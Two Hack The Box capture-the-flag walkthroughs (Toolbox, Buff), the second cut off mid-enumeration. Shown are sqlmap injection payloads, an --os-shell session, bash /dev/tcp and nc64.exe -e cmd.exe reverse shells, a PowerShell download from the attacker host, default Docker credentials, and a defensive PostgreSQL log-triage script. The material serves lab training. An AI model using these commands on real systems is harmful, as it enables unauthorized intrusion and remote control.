Hackthebox Toolbox Walkthrough

Explanation

Hackthebox is a website that hosts a set of vulnerable machines inside its own VPN.
This is a walkthrough of the machine Toolbox.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.236 -sV -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-25 14:23 JST
Nmap scan report for 10.10.10.236
Host is up (0.30s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
|   256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_  256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MegaLogistics
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 12m52s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-04-25T05:50:04
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 848.09 seconds

Gobuster Port 443:

root@kali:~# gobuster dir -u https://10.10.10.236 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.236
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/25 14:41:09 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/25 16:16:46 Finished
===============================================================

FTP Enumeration:

We can find docker-toolbox.exe.

root@kali:~# ftp 10.10.10.236
Connected to 10.10.10.236.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.236:inar1): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
200 Port command successful
150 Opening data channel for directory listing of "/"
-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
226 Successfully transferred "/"
ftp> quit
221 Goodbye

SMB Enumeration:

root@kali:~# smbclient -N -L //10.10.10.236
session setup failed: NT_STATUS_ACCESS_DENIED

2. Getting User

According to the SSL certificate, this server hosts admin.megalogistic.com as a virtual host.

Add this entry to /etc/hosts and open the site in a web browser.
We can find a login form for an administrator.

root@kali:~# cat /etc/hosts | grep admin
10.10.10.236 admin.megalogistic.com

This page contains a login form; check whether it is vulnerable to SQL injection.
We can capture the login request with Burp Suite and save it to a text file for use with sqlmap.

root@kali:~# cat sqlmap.txt 
POST / HTTP/1.1
Host: admin.megalogistic.com
Connection: close
Content-Length: 27
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://admin.megalogistic.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://admin.megalogistic.com/
Accept-Encoding: gzip, deflate
Accept-Language: ja,ja-JP;q=0.9,en;q=0.8
Cookie: PHPSESSID=3fd8d348d81c7d2683bbad164dc0f3ab

username=test&password=test

Then, test for SQL injection with sqlmap.

root@kali:~# sqlmap -r sqlmap.txt --force-ssl
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:42:16 /2021-04-29/

[15:42:16] [INFO] parsing HTTP request from 'sqlmap.txt'
[15:42:16] [INFO] testing connection to the target URL
[15:42:17] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:42:18] [INFO] testing if the target URL content is stable
[15:42:19] [INFO] target URL content is stable
[15:42:19] [INFO] testing if POST parameter 'username' is dynamic
[15:42:20] [WARNING] POST parameter 'username' does not appear to be dynamic
[15:42:21] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'PostgreSQL')
[15:42:23] [INFO] testing for SQL injection on POST parameter 'username'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[15:42:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:42:44] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:42:46] [INFO] testing 'Generic inline queries'
[15:42:47] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[15:42:52] [INFO] POST parameter 'username' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable (with --not-string="11")
[15:42:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:42:53] [INFO] POST parameter 'username' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[15:42:53] [INFO] testing 'PostgreSQL inline queries'
[15:42:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:42:54] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                 
got a 302 redirect to 'https://admin.megalogistic.com:443/dashboard.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[15:43:51] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[15:43:51] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:44:04] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[15:44:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[15:44:35] [WARNING] POST parameter 'password' does not appear to be dynamic
[15:44:36] [INFO] heuristic (basic) test shows that POST parameter 'password' might be injectable (possible DBMS: 'PostgreSQL')
[15:44:37] [INFO] testing for SQL injection on POST parameter 'password'
[15:44:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:44:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:44:50] [INFO] testing 'Generic inline queries'
[15:44:51] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[15:44:54] [INFO] POST parameter 'password' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable 
[15:44:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:44:55] [INFO] POST parameter 'password' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[15:44:55] [INFO] testing 'PostgreSQL inline queries'
[15:44:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:45:10] [INFO] POST parameter 'password' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[15:45:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:45:23] [INFO] POST parameter 'password' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[15:45:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: username=test' AND (SELECT (CASE WHEN (4255=4255) THEN NULL ELSE CAST((CHR(81)||CHR(83)||CHR(106)||CHR(79)) AS NUMERIC) END)) IS NULL-- qXuq&password=test

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=test' AND 6451=CAST((CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (6451=6451) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113)) AS NUMERIC)-- ZQoE&password=test

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=test';SELECT PG_SLEEP(5)--&password=test

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=test' AND 2075=(SELECT 2075 FROM PG_SLEEP(5))-- Jmmv&password=test

Parameter: password (POST)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: username=test&password=test') AND (SELECT (CASE WHEN (1055=1055) THEN NULL ELSE CAST((CHR(84)||CHR(101)||CHR(101)||CHR(104)) AS NUMERIC) END)) IS NULL-- Gnvh

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=test&password=test') AND 7848=CAST((CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7848=7848) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113)) AS NUMERIC)-- cPkC

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=test&password=test');SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=test&password=test') AND 1750=(SELECT 1750 FROM PG_SLEEP(5))-- UTFh
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> q
[15:46:36] [ERROR] user quit

[*] ending @ 15:46:36 /2021-04-29/

root@kali:~# 

Both parameters are vulnerable to SQL injection. Using the --os-shell option, we can gain a shell session.

root@kali:~# sqlmap -r sqlmap.txt --force-ssl --os-shell
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.11#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:49:31 /2021-04-29/

[15:49:31] [INFO] parsing HTTP request from 'sqlmap.txt'
[15:49:32] [INFO] resuming back-end DBMS 'postgresql' 
[15:49:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: username=test&password=test') AND (SELECT (CASE WHEN (1055=1055) THEN NULL ELSE CAST((CHR(84)||CHR(101)||CHR(101)||CHR(104)) AS NUMERIC) END)) IS NULL-- Gnvh

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=test&password=test') AND 7848=CAST((CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7848=7848) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113)) AS NUMERIC)-- cPkC

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=test&password=test');SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=test&password=test') AND 1750=(SELECT 1750 FROM PG_SLEEP(5))-- UTFh

Parameter: username (POST)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: username=test' AND (SELECT (CASE WHEN (4255=4255) THEN NULL ELSE CAST((CHR(81)||CHR(83)||CHR(106)||CHR(79)) AS NUMERIC) END)) IS NULL-- qXuq&password=test

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=test' AND 6451=CAST((CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (6451=6451) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113)) AS NUMERIC)-- ZQoE&password=test

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=test';SELECT PG_SLEEP(5)--&password=test

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=test' AND 2075=(SELECT 2075 FROM PG_SLEEP(5))-- Jmmv&password=test
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[15:49:35] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[15:49:35] [INFO] fingerprinting the back-end DBMS operating system
[15:49:39] [INFO] the back-end DBMS operating system is Linux
[15:49:41] [INFO] testing if current user is DBA
[15:49:44] [INFO] retrieved: '1'
[15:49:45] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[15:49:45] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] n
[15:49:52] [INFO] retrieved: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)'
os-shell> 

To get a reverse shell, we can execute the following command.

root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443

os-shell> bash -c 'bash -i >& /dev/tcp/10.10.14.42/4443 0>&1'
do you want to retrieve the command standard output? [Y/n/a] n

root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443
Connection received on 10.10.10.236 49906
bash: cannot set terminal process group (2736): Inappropriate ioctl for device
bash: no job control in this shell
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ id
id
uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ 

user.txt is in the directory /var/lib/postgresql.

postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
cat user.txt
f0183e44378ea9774433e2ca6ac78c6a  flag.txt
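
The sqlmap run above leaves a characteristic trail in the database log when log_statement = 'all' is enabled. As an added example (not part of the original walkthrough), the script below triages constructed PostgreSQL log lines for the three patterns seen here: pg_sleep timing probes, the CAST(... AS NUMERIC) error-based probe whose failed cast carries the extracted value, and COPY ... FROM PROGRAM, the primitive behind --os-shell. The log prefix format, role names, client addresses, table name and the shape of the application's login query are assumptions.

```python
import re
from collections import Counter

# Constructed PostgreSQL log excerpt (log_line_prefix = '%m [%p] %u@%d %h ',
# log_statement = 'all'). The statements mirror the payload shapes sqlmap
# reported above; the application role, database, client hosts, table name
# and timestamps are made up for this example. The query shape (username in
# quotes, password wrapped in a function call) is inferred from the payload
# terminators sqlmap used: a bare quote for username, quote-plus-parenthesis
# for password.
SAMPLE_LOG = """\
2021-04-29 15:42:16.101 UTC [2710] webapp@megalogistic 172.17.0.1 LOG:  statement: SELECT * FROM users WHERE username = 'test' AND password = md5('test')
2021-04-29 15:42:54.412 UTC [2710] webapp@megalogistic 172.17.0.1 LOG:  statement: SELECT * FROM users WHERE username = 'test';SELECT PG_SLEEP(5)--' AND password = md5('test')
2021-04-29 15:42:55.002 UTC [2710] webapp@megalogistic 172.17.0.1 LOG:  statement: SELECT * FROM users WHERE username = 'test' AND 6451=CAST((CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (6451=6451) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113)) AS NUMERIC)-- ZQoE' AND password = md5('test')
2021-04-29 15:42:55.003 UTC [2710] webapp@megalogistic 172.17.0.1 ERROR:  invalid input syntax for type numeric: "qxvqq1qbpzq"
2021-04-29 15:49:45.870 UTC [2736] webapp@megalogistic 172.17.0.1 LOG:  statement: COPY cmd_output FROM PROGRAM 'id'
2021-04-29 15:50:01.120 UTC [2801] report@megalogistic 172.17.0.5 LOG:  statement: SELECT count(*) FROM shipments WHERE status = 'open'
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+ \S+) \[(?P<pid>\d+)\] "
    r"(?P<user>[^@\s]+)@(?P<db>\S+) (?P<host>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)

# (name, severity, pattern): one rule per technique sqlmap reported above.
# COPY ... FROM PROGRAM is what --os-shell used; PostgreSQL only allows it
# for superusers and members of pg_execute_server_program, which is why
# sqlmap first checked "if current user is DBA". Running the web application
# as a non-superuser role removes that primitive entirely.
RULES = [
    ("os command execution (COPY FROM PROGRAM)", "critical",
     re.compile(r"\bCOPY\s+\S+\s+FROM\s+PROGRAM\b", re.I)),
    ("time-based probe (pg_sleep)", "high",
     re.compile(r"\bpg_sleep\s*\(", re.I)),
    ("error-based probe (CAST ... AS NUMERIC)", "high",
     re.compile(r"\bCAST\s*\(.*\bAS\s+NUMERIC\s*\)", re.I)),
    # The failed cast carries the extracted value between sqlmap's marker
    # strings (here 'qxvqq' and 'qbpzq', the CHR() sequences in the payload).
    ("error-based data leak (numeric cast failure)", "medium",
     re.compile(r'invalid input syntax for type numeric: "(?P<leak>[^"]*)"')),
]


def parse_line(line):
    """Split one log line into its prefix fields and message, or None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def triage(log_text):
    """Return one finding per (log line, matching rule)."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        for name, severity, rx in RULES:
            m = rx.search(rec["msg"])
            if not m:
                continue
            finding = {"rule": name, "severity": severity, "pid": rec["pid"],
                       "user": rec["user"], "host": rec["host"], "ts": rec["ts"]}
            if "leak" in m.groupdict():
                finding["leaked_value"] = m.group("leak")
            findings.append(finding)
    return findings


def summarize(findings):
    """Findings per (client host, role): the injecting session stands out."""
    return Counter((f["host"], f["user"]) for f in findings)


def has_command_execution(findings):
    return any(f["severity"] == "critical" for f in findings)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"[{f['severity']}] pid={f['pid']} {f['user']}@{f['host']}: {f['rule']}")
    print("per-session counts:", dict(summarize(found)))
    print("command execution seen:", has_command_execution(found))
```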

3. Getting Root

Now we have a shell inside a Docker Toolbox container.
The IP address of the container is 172.17.0.2, so we can guess that 172.17.0.1 is the Docker host VM.

postgres@bc56e3cc55e9:/var/lib/postgresql$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 3601  bytes 606518 (592.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2573  bytes 3664168 (3.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8239  bytes 3003425 (2.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8239  bytes 3003425 (2.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

According to the Docker Toolbox documentation, the default credentials for the host VM are docker:tcuser.
To use SSH, we first have to spawn an interactive TTY shell with python3.

postgres@bc56e3cc55e9:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

postgres@bc56e3cc55e9:/$ ssh docker@172.17.0.1
ssh docker@172.17.0.1
docker@172.17.0.1's password: tcuser

   ( '>')
  /) TC (\   Core is distributed with ABSOLUTELY NO WARRANTY.
 (/-_--_-\)           www.tinycorelinux.net

docker@box:~$ 

In /c/Users/Administrator/desktop we can find root.txt (is this intended?).

docker@box:/c/Users/Administrator/desktop$ cat root.txt                        
cat root.txt
cc9a0b76ac17f8f475250738b96261b3 

Hackthebox Buff Walkthrough

Explanation

Hackthebox is a website that hosts a set of vulnerable machines inside its own VPN.
This is a walkthrough of the machine Buff.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.198 -sV -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-19 23:48 JST
Nmap scan report for 10.10.10.198
Host is up (0.43s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1213.36 seconds

Gobuster Port 8080:

root@kali:~# gobuster dir -u http://10.10.10.198:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.198:8080
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/12/27 14:15:39 Starting gobuster
===============================================================
/index.php (Status: 200)
/img (Status: 301)
/home.php (Status: 200)
/contact.php (Status: 200)
/about.php (Status: 200)
/register.php (Status: 200)
/profile (Status: 301)

---

2. Getting User

Looking at http://10.10.10.198:8080, we can find a subtitle that shows the running software and its version.

Using searchsploit, we can find an RCE exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution.

root@kali:~# searchsploit gym management
--------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                   |  Path
--------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection                                   | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass                                | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting                          | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution                | php/webapps/48506.py
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Download the exploit (or use the copy installed on Kali by default), install its Python 2 prerequisites and run the script.
We can confirm that we have command execution.

root@kali:~# python -m pip install requests

---

root@kali:~# python -m pip install colorama

---

root@kali:~# python 48506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun

We have a web shell but still no OS shell.
Start a local HTTP server that hosts nc64.exe, then fetch it on the target with PowerShell.

On the localhost

root@kali:~# ls | grep nc64
nc64.exe

root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

On the target machine

C:\xampp\htdocs\gym\upload> powershell Invoke-WebRequest -Uri http://10.10.14.42:8000/nc64.exe -OutFile C:\xampp\htdocs\gym\upload\nc64.exe
�PNG
�

C:\xampp\htdocs\gym\upload> dir
�PNG
�
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

28/12/2020  00:22    <DIR>          .
28/12/2020  00:22    <DIR>          ..
28/12/2020  00:10                53 kamehameha.php
28/12/2020  00:22            45,272 nc64.exe
               2 File(s)         45,325 bytes
               2 Dir(s)   9,841,668,096 bytes free

Launch a local netcat listener and execute nc64.exe on the target.
Now we have a reverse shell as shaun.

On the localhost

root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443

On the target machine

C:\xampp\htdocs\gym\upload> nc64.exe 10.10.14.42 4443 -e cmd.exe

On the localhost

root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443
Connection received on 10.10.10.198 49684
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

user.txt is in C:\Users\shaun\Desktop.

C:\Users\shaun\Desktop>type user.txt
type user.txt
16a71e4eade671c342101c50b256e2ef

3. Getting Root

In the C:\Users\shaun\Downloads directory, we can find an interesting binary called CloudMe_1112.exe.

C:\Users\shaun\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

14/07/2020  12:27    <DIR>          .
14/07/2020  12:27    <DIR>          ..
16/06/2020  15:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   9,840,857,088 bytes free

Using the following command, we can see that this binary is actually running as a process.

C:\xampp\htdocs\gym\upload>tasklist -v | findstr CloudMe
tasklist -v | findstr CloudMe
CloudMe.exe                   4128                            0     38,552 K Unknown

Run searchsploit again for CloudMe.
We can find a buffer overflow exploit: CloudMe 1.11.2 - Buffer Overflow.

root@kali:~# searchsploit cloudme
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                             | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                                    | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                                    | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                                   | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)                            | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)                     | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                                        | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                                    | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)                           | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                                            | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)                         | windows_x86-64/remote/44784.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We have to check the default port of CloudMe. We did not see port 8888 during the port scan because the service listens only on 127.0.0.1.

On the localhost

root@kali:~# cat 48389.py | grep connect
    s.connect((target,8888))

On the target host

C:\Users\shaun\Downloads>netstat -an
netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING
